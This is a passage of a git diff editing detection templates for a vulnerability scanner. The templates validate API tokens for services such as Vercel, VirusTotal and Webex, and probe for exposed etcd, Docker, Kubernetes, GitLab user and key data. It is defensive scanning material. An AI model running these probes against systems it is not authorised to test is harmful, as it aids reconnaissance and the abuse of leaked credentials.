https://vercel.com/docs/rest-api + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 + tags: token-spray,vercel + +self-contained: true + +http: + - method: GET + path: + - "https://api.vercel.com/www/user" + + headers: + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - '"user":' + - '"username":' + - '"email":' + condition: and + +# digest: 4b0a00483046022100e453d7076b93a15fefaf23195bf6d278dde6cd0809fe2ed049dd453f91e43784022100ef7b70f1946aae18e614327cc98c1cbad46099255acc445b4000643cd5407739:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-vercel.yaml b/poc/api/api-vercel.yaml deleted file mode 100644 index 0c3baed35a..0000000000 --- a/poc/api/api-vercel.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-vercel - -info: - name: Vercel API Test - author: dwisiswant0 - severity: info - reference: https://vercel.com/docs/rest-api - tags: token-spray,vercel - -self-contained: true -requests: - - method: GET - path: - - "https://api.vercel.com/www/user" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - '"user":' - - '"username":' - - '"email":' - condition: and diff --git a/poc/api/api-virustotal-511.yaml b/poc/api/api-virustotal-511.yaml deleted file mode 100644 index fbcb6e2600..0000000000 --- a/poc/api/api-virustotal-511.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-virustotal - -info: - name: VirusTotal API Test - author: daffainfo - severity: info - reference: - - https://developers.virustotal.com/reference - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md - tags: token-spray,virustotal - -self-contained: true -requests: - - raw: - - | - POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1 - Host: www.virustotal.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 86 - - apikey={{token}}&url=google.com - - matchers: - - type: word - part: body - words: - - "'verbose_msg':" - - "'scan_date':" - - "'permalink':" - condition: and diff --git a/poc/api/api-virustotal-512.yaml b/poc/api/api-virustotal-512.yaml index 0c039312df..fbcb6e2600 100644 --- a/poc/api/api-virustotal-512.yaml +++ b/poc/api/api-virustotal-512.yaml @@ -6,14 +6,11 @@ info: severity: info reference: - https://developers.virustotal.com/reference - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/VirusTotal.md - metadata: - max-request: 1 + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/VirusTotal.md tags: token-spray,virustotal self-contained: true - -http: +requests: - raw: - | POST https://www.virustotal.com/vtapi/v2/url/scan HTTP/1.1 @@ -27,9 +24,7 @@ http: - type: word part: body words: - - '"verbose_msg":' - - '"scan_date":' - - '"permalink":' + - "'verbose_msg':" + - "'scan_date':" + - "'permalink':" condition: and - -# digest: 4a0a0047304502206f6e83dbc66717b54926126ec584b60835783cb586214f57b93eb61d080e5a42022100d5a22a1ab5a848eb279134bd608e7b8288641d7fd089fe753bffd6de99668f8f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-wakatime.yaml b/poc/api/api-wakatime.yaml deleted file mode 100644 index b48ed5e79f..0000000000 --- a/poc/api/api-wakatime.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: api-wakatime - -info: - name: WakaTime CI API Test - author: zzeitlin - reference: https://wakatime.com/developers - severity: info - tags: token-spray,wakatime - -requests: - - method: GET - path: - - "https://wakatime.com/api/v1/users/current/projects/?api_key={{token}}" - - matchers: - - type: status - status: - - 401 - negative: true diff --git a/poc/api/api-webex-515.yaml b/poc/api/api-webex-515.yaml new file mode 100644 index 0000000000..a3a91b43b5 --- /dev/null +++ b/poc/api/api-webex-515.yaml @@ -0,0 +1,31 @@ +id: api-webex + +info: + name: Cisco Webex API Test + author: dwisiswant0 + severity: info + reference: + - https://developer.webex.com/docs/getting-started + metadata: + max-request: 1 + tags: token-spray,cisco,webex + +self-contained: true + +http: + - method: GET + path: + - "https://webexapis.com/v1/rooms" + + headers: + Authorization: Bearer {{token}} + matchers: + - type: word + part: body + words: + - 'id' + - 'title' + - 'type' + condition: and + +# digest: 4b0a00483046022100a0f9326cc62a9b167f1b449212945380447ec7661a36537c180f544027dfb055022100e3e6fa46853c97ea7094e22c00e1fd1c033fbd5533e6d5ca9faf325deb8a52cc:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-webex.yaml b/poc/api/api-webex.yaml deleted file mode 100644 index c5e61ded0b..0000000000 --- a/poc/api/api-webex.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-webex - -info: - name: Cisco Webex API Test - author: dwisiswant0 - severity: info - reference: https://developer.webex.com/docs/getting-started - tags: token-spray,cisco,webex - -self-contained: true -requests: - - method: GET - path: - - "https://webexapis.com/v1/rooms" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: word - part: body - words: - - 'id' - - 'title' - - 'type' - condition: and diff --git a/poc/api/api-weglot-516.yaml b/poc/api/api-weglot-516.yaml index 37e6b647ef..24b4eb47d8 100644 --- a/poc/api/api-weglot-516.yaml +++ b/poc/api/api-weglot-516.yaml @@ -3,22 +3,31 @@ id: api-weglot info: name: WeGlot API Test author: zzeitlin - reference: https://developers.weglot.com/api/reference severity: info + reference: + - https://developers.weglot.com/api/reference + metadata: + max-request: 1 tags: token-spray,weglot self-contained: true -requests: + +http: - method: POST path: - "https://api.weglot.com/translate?api_key={{token}}" + headers: Content-Type: application/json - body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" + body: "{\"l_from\":\"en\",\"l_to\":\"fr\",\"request_url\":\"https://www.website.com/\",\"words\":[{\"w\":\"This is a blue car\",\"t\":1},{\"w\":\"This is a black car\",\"t\":1}]}" matchers: - type: word part: body negative: true + case-insensitive: true words: - 'does not exist' + - 'Invalid authorization' + +# digest: 4b0a00483046022100ad7d803245b5df9d6efd805d70f2e3303c64a0a88e0b4e416f90b9f0c2907f01022100aa10de8bba28c7bb25637af21d8b06e3e85595f4f9d2ebca617ffa57cffe7ff7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/api-wordcloud-518.yaml b/poc/api/api-wordcloud-518.yaml index e466b32652..860ab73d73 100644 --- a/poc/api/api-wordcloud-518.yaml +++ b/poc/api/api-wordcloud-518.yaml @@ -6,7 +6,7 @@ info: severity: info reference: - https://wordcloudapi.com/getting-started - - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Word%20Cloud.md + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Word%20Cloud.md tags: token-spray,wordcloud self-contained: true diff --git a/poc/api/api-wordcloud.yaml b/poc/api/api-wordcloud.yaml deleted file mode 100644 index 860ab73d73..0000000000 --- a/poc/api/api-wordcloud.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: api-wordcloud - -info: - name: Word Cloud API Test - author: daffainfo - severity: info - reference: - - https://wordcloudapi.com/getting-started - - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Word%20Cloud.md - tags: token-spray,wordcloud - -self-contained: true -requests: - - raw: - - | - POST https://textvis-word-cloud-v1.p.rapidapi.com/v1/textToCloud HTTP/1.1 - Host: textvis-word-cloud-v1.p.rapidapi.com - content-type: application/json - x-rapidapi-host: textvis-word-cloud-v1.p.rapidapi.com - x-rapidapi-key: {{token}} - Content-Length: 349 - - { - "text": "This is a test. I repeat, this is a test. We are only testing the functionality of this api, nothing else. End of test.", - "scale": 0.5, - "width": 400, - "height": 400, - "colors": [ - "#375E97", - "#FB6542", - "#FFBB00", - "#3F681C" - ], - "font": "Tahoma", - "use_stopwords": true, - "language": "en", - "uppercase": false - } - - matchers: - - type: word - part: body - negative: true - words: - - '{"message":"You are not subscribed to this API."}' diff --git a/poc/api/apiman-panel-462.yaml b/poc/api/apiman-panel-462.yaml deleted file mode 100644 index 24bbf1f89b..0000000000 --- a/poc/api/apiman-panel-462.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: apiman-panel - -info: - name: Apiman Login Panel - author: righettod - severity: info - description: An Apiman instance was detected via the login redirection. - reference: - - https://www.apiman.io/latest/ - classification: - cwe-id: CWE-200 - tags: panel,apiman - -requests: - - method: GET - path: - - "{{BaseURL}}/apimanui/api-manager" - - matchers-condition: and - matchers: - - type: word - words: - - "/auth/realms/apiman" - part: header - - - type: status - status: - - 302 - -# Enhanced by mp on 2022/03/18 diff --git a/poc/api/apiman-panel.yaml b/poc/api/apiman-panel.yaml deleted file mode 100644 index c6ce40a2c4..0000000000 --- a/poc/api/apiman-panel.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: apiman-panel - -info: - name: Apiman Instance Detection Template - author: righettod - severity: info - description: Try to detect the presence of a Apiman instance via the login redirection - tags: panel,apiman - -requests: - - method: GET - path: - - "{{BaseURL}}/apimanui/api-manager" - - matchers-condition: and - matchers: - - type: word - words: - - "/auth/realms/apiman" - part: header - - - type: status - status: - - 302 \ No newline at end of file diff --git a/poc/api/arcgis-rest-api-532.yaml b/poc/api/arcgis-rest-api-532.yaml new file mode 100644 index 0000000000..b60cfd2026 --- /dev/null +++ b/poc/api/arcgis-rest-api-532.yaml @@ -0,0 +1,32 @@ +id: arcgis-rest-api + +info: + name: ArcGIS Exposed Docs + author: Podalirius + severity: info + description: ArcGIS documents were discovered. + tags: api,arcgis,cms + reference: + - https://enterprise.arcgis.com/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/server/sdk/rest/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'ArcGIS REST API' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/poc/api/arcgis-rest-api-533.yaml b/poc/api/arcgis-rest-api-533.yaml deleted file mode 100644 index 897c70d812..0000000000 --- a/poc/api/arcgis-rest-api-533.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: arcgis-rest-api - -info: - name: ArcGIS Exposed Docs - author: Podalirius - severity: info - description: ArcGIS documents were discovered. - reference: - - https://enterprise.arcgis.com/en/ - classification: - cwe-id: CWE-200 - tags: api,arcgis,cms - -requests: - - method: GET - path: - - '{{BaseURL}}/server/sdk/rest/index.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'ArcGIS REST API' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/poc/api/arcgis-rest-api.yaml b/poc/api/arcgis-rest-api.yaml index b60cfd2026..897c70d812 100644 --- a/poc/api/arcgis-rest-api.yaml +++ b/poc/api/arcgis-rest-api.yaml @@ -5,14 +5,11 @@ info: author: Podalirius severity: info description: ArcGIS documents were discovered. - tags: api,arcgis,cms reference: - https://enterprise.arcgis.com/en/ classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: cwe-id: CWE-200 + tags: api,arcgis,cms requests: - method: GET diff --git a/poc/api/bems-api-lfi-707.yaml b/poc/api/bems-api-lfi-707.yaml index 010b496245..fa2efedbb9 100644 --- a/poc/api/bems-api-lfi-707.yaml +++ b/poc/api/bems-api-lfi-707.yaml @@ -1,11 +1,12 @@ id: bems-api-lfi info: - name: Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download + name: Longjing Technology BEMS API 1.21 - Arbitrary File Retrieval author: gy741 severity: high - description: The application suffers from an unauthenticated arbitrary file download vulnerability. Input passed through the fileName parameter through downloads endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php + description: The application suffers from an unauthenticated arbitrary file retrieval vulnerability. Input passed through the fileName parameter through the downloads API endpoint is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files through directory traversal attacks. + reference: + - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5657.php tags: lfi requests: diff --git a/poc/api/burp-api-detect-811.yaml b/poc/api/burp-api-detect-811.yaml deleted file mode 100644 index e09396dbd2..0000000000 --- a/poc/api/burp-api-detect-811.yaml +++ /dev/null @@ -1,34 +0,0 @@ -id: burp-rest-api-detect - -info: - name: Burp Rest API Server Running - author: joanbono - severity: info - reference: - - https://portswigger.net/burp/documentation/enterprise/api-reference - metadata: - max-request: 1 - tags: burp,tech - -http: - - method: GET - path: - - "{{BaseURL}}/v0.1/" - - matchers-condition: and - matchers: - - type: word - words: - - 'Burp API' - part: body - - - type: word - words: - - 'X-Burp-Version' - part: header - - - type: status - status: - - 200 - -# digest: 4a0a00473045022052b868b75ef5acca38021fc922afd6de009fc394c0ff24b726bc9c1a6938ce18022100e2e714ce631619d950c6e0c2fa132fbefcea5bf44ba1084d4aae98548f93dd7f:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/burp-api-detect-809.yaml b/poc/api/burp-api-detect.yaml similarity index 100% rename from poc/api/burp-api-detect-809.yaml rename to poc/api/burp-api-detect.yaml diff --git a/poc/api/couchbase-buckets-api-1232.yaml b/poc/api/couchbase-buckets-api-1232.yaml deleted file mode 100644 index 124887fab9..0000000000 --- a/poc/api/couchbase-buckets-api-1232.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: couchbase-buckets-api - -info: - name: Couchbase Buckets REST API - Unauthenticated - author: geeknik - severity: info - reference: - - https://docs.couchbase.com/server/current/rest-api/rest-bucket-intro.html - - https://www.elastic.co/guide/en/beats/metricbeat/current/metricbeat-metricset-couchbase-bucket.html - tags: exposure,couchbase - -requests: - - method: GET - path: - - "{{BaseURL}}/pools/default/buckets" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - '"couchbase":' - - '"bucket":' - - '"data":' - condition: and - - - type: word - part: header - words: - - 'application/json' diff --git a/poc/api/couchbase-buckets-api-1233.yaml b/poc/api/couchbase-buckets-api.yaml similarity index 100% rename from poc/api/couchbase-buckets-api-1233.yaml rename to poc/api/couchbase-buckets-api.yaml diff --git a/poc/api/etcd-unauthenticated-api.yaml b/poc/api/etcd-unauthenticated-api.yaml index b41d5c896c..bec8776583 100644 --- a/poc/api/etcd-unauthenticated-api.yaml +++ b/poc/api/etcd-unauthenticated-api.yaml @@ -4,37 +4,27 @@ info: name: etcd Unauthenticated HTTP API Leak author: dhiyaneshDk severity: high - reference: - - https://hackerone.com/reports/1088429 - metadata: - max-request: 1 - tags: misconfig,hackerone,unauth,etcd + reference: https://hackerone.com/reports/1088429 + tags: unauth -http: +requests: - method: GET path: - "{{BaseURL}}/v2/auth/roles" - matchers-condition: and matchers: - type: word - part: body words: - '"roles"' - '"permissions"' - '"role"' - '"kv"' condition: and - + part: body + - type: status + status: + - 200 - type: word part: header words: - "text/plain" - - "application/json" - condition: or - - - type: status - status: - - 200 - -# digest: 4b0a00483046022100897d3dde5e9a2dfd0ab7d17ab781c555d44ad28bc754236ec6bf33a7ec4c0d7c022100f5ba5418fa82fa65ff1d95bedc9dffea5b1861016c575cc71e7898fbd6c8a3ea:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/exposed-docker-api-7300.yaml b/poc/api/exposed-docker-api-7300.yaml index 527544a236..e8e4a61948 100644 --- a/poc/api/exposed-docker-api-7300.yaml +++ b/poc/api/exposed-docker-api-7300.yaml @@ -1,35 +1,29 @@ -id: exposed-docker-api - -info: - name: Exposed Docker API - author: furkansenan,dwisiswant0 - severity: info - metadata: - max-request: 2 - tags: docker,unauth,devops,misconfig - -http: - - method: GET - path: - - "http://{{Hostname}}/version" - - "http://{{Hostname}}/v1.24/version" - - matchers-condition: and - matchers: - - type: word - words: - - "application/json" - part: header - - - type: word - words: - - "KernelVersion" - - "BuildTime" - condition: and - part: body - - - type: status - status: - - 200 - -# digest: 490a0046304402203efb60ca5cd72b8e84389f1f375a834b8f2b7249a37ebb17fcf1fe352301abc402202547c7d3f2bcbd803a4dc349cb4d6d4a0b41f5915aa09c6b3216b504f6714566:922c64590222798bb761d5b6d8e72950 +id: exposed-docker-api + +info: + name: Exposed Docker API + author: furkansenan,dwisiswant0 + severity: info + tags: docker,unauth,devops + +requests: + - method: GET + path: + - "http://{{Hostname}}/version" + - "http://{{Hostname}}/v1.24/version" + + matchers-condition: and + matchers: + - type: word + words: + - "application/json" + part: header + - type: word + words: + - "KernelVersion" + - "BuildTime" + condition: and + part: body + - type: status + status: + - 200 diff --git a/poc/api/exposed-glances-api-7308.yaml b/poc/api/exposed-glances-api-7308.yaml index e00fe91045..d1028e6dd8 100644 --- a/poc/api/exposed-glances-api-7308.yaml +++ b/poc/api/exposed-glances-api-7308.yaml @@ -1,29 +1,27 @@ -id: exposed-glances-api - -info: - name: Exposed Glances API - author: princechaddha - severity: low - description: Glances is a cross-platform system monitoring tool written in Python. - reference: - - https://nicolargo.github.io/glances/ - tags: glances,exposure - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'title">Glances' - - 'glances.config' - - '' - part: body - condition: and +id: exposed-glances-api +info: + name: Exposed Glances API + author: princechaddha + severity: low + description: Glances is a cross-platform system monitoring tool written in Python. + reference: https://nicolargo.github.io/glances/ + tags: glances,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'title">Glances' + - 'glances.config' + - '' + part: body + condition: and diff --git a/poc/api/fastapi-docs-7398.yaml b/poc/api/fastapi-docs-7398.yaml deleted file mode 100644 index e0925b7940..0000000000 --- a/poc/api/fastapi-docs-7398.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: fastapi-docs - -info: - name: FastAPI Docs - author: github.com/its0x08 - severity: info - tags: fastapi,tech,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/docs" - - "{{BaseURL}}/redoc" - - "{{BaseURL}}/openapi.json" - - matchers: - - type: word - words: - - "FastAPI - Swagger UI" - - "FastAPI - ReDoc" - - '{"title":"FastAPI"' - condition: or diff --git a/poc/api/fastapi-docs-7399.yaml b/poc/api/fastapi-docs-7399.yaml index 794df02ac0..e0925b7940 100644 --- a/poc/api/fastapi-docs-7399.yaml +++ b/poc/api/fastapi-docs-7399.yaml @@ -1,22 +1,22 @@ -id: fastapi-docs - -info: - name: FastAPI Docs - author: github.com/its0x08 - severity: info - tags: fastapi,tech,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/docs" - - "{{BaseURL}}/redoc" - - "{{BaseURL}}/openapi.json" - - matchers: - - type: word - words: - - "FastAPI - Swagger UI" - - "FastAPI - ReDoc" - - '{"title":"FastAPI"' - condition: or +id: fastapi-docs + +info: + name: FastAPI Docs + author: github.com/its0x08 + severity: info + tags: fastapi,tech,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/docs" + - "{{BaseURL}}/redoc" + - "{{BaseURL}}/openapi.json" + + matchers: + - type: word + words: + - "FastAPI - Swagger UI" + - "FastAPI - ReDoc" + - '{"title":"FastAPI"' + condition: or diff --git a/poc/api/gitlab-api-user-enum-7669.yaml b/poc/api/gitlab-api-user-enum-7669.yaml index 4edf1734a5..e335cf9397 100644 --- a/poc/api/gitlab-api-user-enum-7669.yaml +++ b/poc/api/gitlab-api-user-enum-7669.yaml @@ -1,15 +1,12 @@ id: gitlab-api-user-enum - info: - name: GitLab - User Information Disclosure Via Open API author: Suman_Kar + name: GitLab - User Information Disclosure Via Open API severity: medium - reference: - - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 + reference: https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 metadata: shodan-query: http.title:"GitLab" tags: gitlab,enum,misconfig,disclosure - requests: - raw: - | @@ -17,10 +14,8 @@ requests: Host: {{Hostname}} Accept: application/json, text/plain, */* Referer: {{BaseURL}} - payloads: uid: helpers/wordlists/numbers.txt - stop-at-first-match: true matchers-condition: and matchers: @@ -31,12 +26,10 @@ requests: - "username.*" - "id.*" - "name.*" - - type: word part: header words: - "application/json" - - type: status status: - 200 diff --git a/poc/api/gitlab-api-user-enum.yaml b/poc/api/gitlab-api-user-enum.yaml index 40bafaf2d9..6d6aac772a 100644 --- a/poc/api/gitlab-api-user-enum.yaml +++ b/poc/api/gitlab-api-user-enum.yaml @@ -1,4 +1,5 @@ id: gitlab-api-user-enum + info: name: GitLab - User Information Disclosure Via Open API author: Suman_Kar @@ -6,18 +7,22 @@ info: reference: - https://gitlab.com/gitlab-org/gitlab-foss/-/issues/40158 metadata: + max-request: 100 shodan-query: http.title:"GitLab" tags: gitlab,enum,misconfig,disclosure -requests: + +http: - raw: - | GET /api/v4/users/{{uid}} HTTP/1.1 Host: {{Hostname}} Accept: application/json, text/plain, */* Referer: {{BaseURL}} + payloads: uid: helpers/wordlists/numbers.txt stop-at-first-match: true + matchers-condition: and matchers: - type: regex @@ -27,10 +32,14 @@ requests: - "username.*" - "id.*" - "name.*" + - type: word part: header words: - "application/json" + - type: status status: - 200 + +# digest: 4b0a00483046022100e91d88c0e5b8fc728356db398d1642b8928c8b06e2d15eb1b1d8aa7370e1ebe1022100f00de311f83fd9785f1655ac58104c405353183930d8524cc2802d7a98096df8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/gmail-api-client-secrets-7741.yaml b/poc/api/gmail-api-client-secrets-7741.yaml deleted file mode 100644 index 72f7d06ecc..0000000000 --- a/poc/api/gmail-api-client-secrets-7741.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: gmail-api-client-secrets - -info: - name: GMail API - Detect - author: geeknik - severity: info - description: GMail API was detected. - reference: https://developers.google.com/gmail/api/auth/web-server - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0 - cwe-id: CWE-200 - metadata: - max-request: 1 - tags: config,exposure - -http: - - method: GET - path: - - "{{BaseURL}}/client_secrets.json" - - matchers-condition: and - matchers: - - type: word - words: - - "client_id" - - "auth_uri" - - "token_uri" - condition: and - - - type: status - status: - - 200 - - - type: word - part: header - words: - - "application/json" - -# digest: 4a0a00473045022100e423f2d50edff69e6eb1b5bc47e8f482b97de447024a3623818e28a08199321a02207f96b638e3b21026d86306511d783491c0cc00d9484b54499fe7cfea40baead3:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/google-api-7771.yaml b/poc/api/google-api-7771.yaml new file mode 100644 index 0000000000..c227c5263b --- /dev/null +++ b/poc/api/google-api-7771.yaml @@ -0,0 +1,16 @@ +id: google-api-key + +info: + name: Google API key + author: gaurang + severity: info + tags: token,file + +file: + - extensions: + - all + + extractors: + - type: regex + regex: + - "AIza[0-9A-Za-z\\-_]{35}" \ No newline at end of file diff --git a/poc/api/google-api-key-7770.yaml b/poc/api/google-api-key-7770.yaml index c227c5263b..c1b8b0434c 100644 --- a/poc/api/google-api-key-7770.yaml +++ b/poc/api/google-api-key-7770.yaml @@ -1,16 +1,20 @@ id: google-api-key - info: - name: Google API key - author: gaurang - severity: info - tags: token,file - -file: - - extensions: - - all - + name: Google API Key + author: Swissky + severity: medium +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "AIza[0-9A-Za-z\\-_]{35}" extractors: - type: regex + part: body regex: - - "AIza[0-9A-Za-z\\-_]{35}" \ No newline at end of file + - "AIza[0-9A-Za-z\\-_]{35}" diff --git a/poc/api/google-api.yaml b/poc/api/google-api.yaml index 1242ce0367..a9ecc5e465 100644 --- a/poc/api/google-api.yaml +++ b/poc/api/google-api.yaml @@ -5,7 +5,6 @@ info: author: gaurang severity: info tags: token,file,google - file: - extensions: - all @@ -14,3 +13,5 @@ file: - type: regex regex: - "AIza[0-9A-Za-z\\-_]{35}" + +# digest: 4a0a00473045022100d4eba7b0bbc16197a7abcd64c4984de85041967f2e79373da78c9f378a74a73c02207be725903a2ee86cc856339e809ab4741494141c6f68c64bbbfd310adceaa446:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml b/poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml new file mode 100644 index 0000000000..1c523c0a06 --- /dev/null +++ b/poc/api/http-etcd-unauthenticated-api-data-leak-8056.yaml @@ -0,0 +1,28 @@ +id: http-etcd-unauthenticated-api-data-leak +info: + name: etcd Unauthenticated HTTP API Leak + author: dhiyaneshDk + severity: high + reference: https://hackerone.com/reports/1088429 + tags: unauth +requests: + - method: GET + path: + - "{{BaseURL}}/v2/auth/roles" + matchers-condition: and + matchers: + - type: word + words: + - '"roles"' + - '"permissions"' + - '"role"' + - '"kv"' + condition: and + part: body + - type: status + status: + - 200 + - type: word + part: header + words: + - "text/plain" diff --git a/poc/api/http-etcd-unauthenticated-api-data-leak.yaml b/poc/api/http-etcd-unauthenticated-api-data-leak.yaml index 1c523c0a06..ba35991570 100644 --- a/poc/api/http-etcd-unauthenticated-api-data-leak.yaml +++ b/poc/api/http-etcd-unauthenticated-api-data-leak.yaml @@ -1,14 +1,24 @@ id: http-etcd-unauthenticated-api-data-leak + info: name: etcd Unauthenticated HTTP API Leak author: dhiyaneshDk severity: high reference: https://hackerone.com/reports/1088429 tags: unauth + requests: - - method: GET - path: - - "{{BaseURL}}/v2/auth/roles" + - payloads: + Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt + attack: sniper + threads: 100 + + raw: + - | + GET /v2/auth/roles HTTP/1.1 + Host: {{Subdomains}} + User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 + Accept-Encoding: gzip, deflate matchers-condition: and matchers: - type: word diff --git a/poc/api/kube-api-namespaces-8505.yaml b/poc/api/kube-api-namespaces-8505.yaml index 083c018d9d..934bb7bcb6 100644 --- a/poc/api/kube-api-namespaces-8505.yaml +++ b/poc/api/kube-api-namespaces-8505.yaml @@ -1,12 +1,15 @@ id: kube-api-namespaces + info: name: Kube API Namespaces author: sharath severity: info description: Scans for kube namespaces + metadata: + max-request: 1 tags: tech,k8s,kubernetes,devops,kube -requests: +http: - method: GET path: - "{{BaseURL}}/api/v1/namespaces" @@ -22,4 +25,6 @@ requests: words: - '"NamespaceList":' - '"items":' - condition: and \ No newline at end of file + condition: and + +# digest: 4a0a00473045022063f688f881894ac393b696d0737d2878f4de4af5f596910eb3b8bf17686f8a97022100af751c175b370dd577b22c6fa201f6a8ceaf6bf88707ee2686612b42b45ae3ae:922c64590222798bb761d5b6d8e72950 diff --git a/poc/api/kube-api-namespaces.yaml b/poc/api/kube-api-namespaces.yaml deleted file mode 100644 index b4e820623c..0000000000 --- a/poc/api/kube-api-namespaces.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: kube-api-namespaces -info: - name: Kube API Namespaces - author: sharath - severity: info - description: Scans for kube namespaces - tags: tech,k8s,kubernetes,devops,kube -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/namespaces" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - '"NamespaceList":' - - '"items":' - condition: and diff --git a/poc/api/kube-api-nodes-8507.yaml b/poc/api/kube-api-nodes-8507.yaml index 0b108b7d35..29b885b67e 100644 --- a/poc/api/kube-api-nodes-8507.yaml +++ b/poc/api/kube-api-nodes-8507.yaml @@ -1,25 +1,25 @@ id: kube-api-nodes info: name: Kube API Nodes - author: sharath + author: sharath,ritikchaddha severity: info description: Scans for kube nodes tags: tech,k8s,kubernetes,devops,kube - requests: - method: GET path: - "{{BaseURL}}/api/v1/nodes" - - matchers-condition: and + matchers-condition: or matchers: - - type: status - status: - - 200 - - type: word part: body words: - '"NodeList":' - '"items":' - condition: and \ No newline at end of file + condition: and + - type: word + part: body + words: + - '"containerRuntimeVersion"' + - '"kubeletVersion": "v' + condition: and diff --git a/poc/api/kube-api-nodes-8508.yaml b/poc/api/kube-api-nodes-8508.yaml deleted file mode 100644 index 29b885b67e..0000000000 --- a/poc/api/kube-api-nodes-8508.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: kube-api-nodes -info: - name: Kube API Nodes - author: sharath,ritikchaddha - severity: info - description: Scans for kube nodes - tags: tech,k8s,kubernetes,devops,kube -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/nodes" - matchers-condition: or - matchers: - - type: word - part: body - words: - - '"NodeList":' - - '"items":' - condition: and - - type: word - part: body - words: - - '"containerRuntimeVersion"' - - '"kubeletVersion": "v' - condition: and diff --git a/poc/api/kube-api-nodes.yaml b/poc/api/kube-api-nodes.yaml deleted file mode 100644 index 8e44c71d24..0000000000 --- a/poc/api/kube-api-nodes.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: kube-api-nodes -info: - name: Kube API Nodes - author: sharath - severity: info - description: Scans for kube nodes - tags: tech,k8s,kubernetes,devops,kube -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/nodes" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - '"NodeList":' - - '"items":' - condition: and diff --git a/poc/api/kube-api-pods-8510.yaml b/poc/api/kube-api-pods-8510.yaml deleted file mode 100644 index 2355efbaa9..0000000000 --- a/poc/api/kube-api-pods-8510.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: kube-api-pods -info: - name: Kube API Pods - author: sharath - severity: info - description: Scans for kube pods - tags: tech,k8s,kubernetes,devops,kube -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/namespaces/default/pods" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - part: body - words: - - '"PodList":' - - '"items":' - condition: and diff --git 